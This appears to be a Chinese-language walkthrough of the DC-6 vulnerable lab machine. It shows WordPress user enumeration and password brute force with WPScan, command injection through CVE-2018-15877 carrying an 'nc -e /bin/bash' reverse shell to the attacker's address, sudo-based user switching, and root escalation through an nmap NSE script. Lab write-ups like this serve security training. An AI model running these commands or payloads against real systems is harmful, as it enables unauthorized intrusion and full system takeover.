1.使用nmap进行信息搜集，存活主机，端口
192.168.85.184是存活主机，发现开放22，80端口
2.访问192.168.85.184的80端口
发现被重定向了，修改hosts文件

vim /etc/hosts
添加一行
192.168.85.174 wordy

3.对网站进行信息搜集并进行相关利用
找到一段信息


主要是说插件安全的问题，估计利用wordpress插件的漏洞
访问http://192.168.85.184/wp-includes，发现目录遍历，找到一些插件，尝试搜索相关漏洞利用，失败的

cms通过观察是wordpress，要知道wordpress有哪些漏洞就要知道版本

使用dirb对目录进行扫描

dirb http://192.168.85.184/

发现后台目录/wp-admin
尝试弱口令，失败
尝试sql注入，万能密码失败
4.使用wpscan对网站进行扫描
知道wordpress有哪些漏洞就要知道版本
扫描出版本 5.1.1，没找到漏洞
做靶机时要看一下官网描述
官网描述

只有一个flag，在root目录里
官网线索

主要说使用这个命令会节省你的时间
5.使用wpscan进行爆破
扫描用户名并写入user.txt

wpscan --url http://192.168.85.184 -e u

5个用户名写入user.txt
admin
mark
graham
sarah
jens
密码字典

gunzip rockyou.txt.gz           #解压
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破

wpscan --url http://192.168.85.184 -U user.txt -P pass.txt

用户名 mark
密码 helpdesk01

6.登录后台，寻找可以利用点
登录成功
在一些wordpress版本中，是可以上传插件和主题的，可以在这个地方直接上传一句话木马，注意上传插件时可能会失败，但是当你查看文件时时上传成功的，因为上传插件时是先上传在解压安装的，之后可以在msf的php或linux马继续上线，进行下一步操作
没有发现上传的位置

发现一个插件，搜索相关漏洞
找到CVE-2018-15877，是命令执行漏洞

7.利用cve-2018-15877
在 Activity Monito的tools处有命令执行

在3处输入命令，在4处点击执行，3处有长度限制，f12修改最大长度
有两个思路
写一句话木马
反弹shell
写一句话木马失败，可能是权限问题
3处反弹shell

127.0.0.1|nc -e /bin/bash 192.168.85.129 4455

kali nc监听

nc -lvnp 4455
python进入交互式会话
python -c ’import pty；pty.spawn("/bin/bash")'

成功反弹

8.对主机进行信息搜集，进行提权
查看内核版本，版本是4.0的版本，太高没有找到漏洞

uname -a

当前权限www-data
把有权限的地方都看一看
进入家目录
进入到jens的家目录，发现一个备份backups.sh,查看内容，是打包web根目录下的文件

这个地方想到了linux提权中的打包提权，查看权限是jens权限，不是root权限
查找suid权限，发现sudo

sudo -l #查看当前用户的一些sudo权限

继续搜集
进入mark家目录，发现graham密码

username:graham
passwd:GSo7isUM1D4
9.使用graham用户登录ssh或su 切换用户
ssh 192.168.85.184 -l graham
GSo7isUM1D4

执行下面命令发现可以jens执行backups.sh

sudo -l

可以不需要jens密码以jens权限执行backups.sh

当写入赋予find的s权限，在作为打包命令执行的参数执行前面的命令执行时，是不能执行的，因为sudo文件的一些命令被禁止了以root权限执行

有一个思路看一下其他用户登录时sudo -l可以执行什么，但是使用前面搜集的两个密码登录都失败了
还有一个思路可以写入/bin/bash,sudo可以切换到jens用户

echo '/bin/bash'>>/home/jens/backups.sh
#sudo -u以指定用户执行
sudo -u jens ./home/jens/backups.sh

成功切换到jens用户

10.nmap提权
执行以下命令，发现可以不需要密码以root执行nmap命令

sudo -l

写一个bash，以root权限执行

echo 'os.execute('/bin/bash')' >1.nse
sudo nmap --script=1.nse
id

参考文章：
dc-6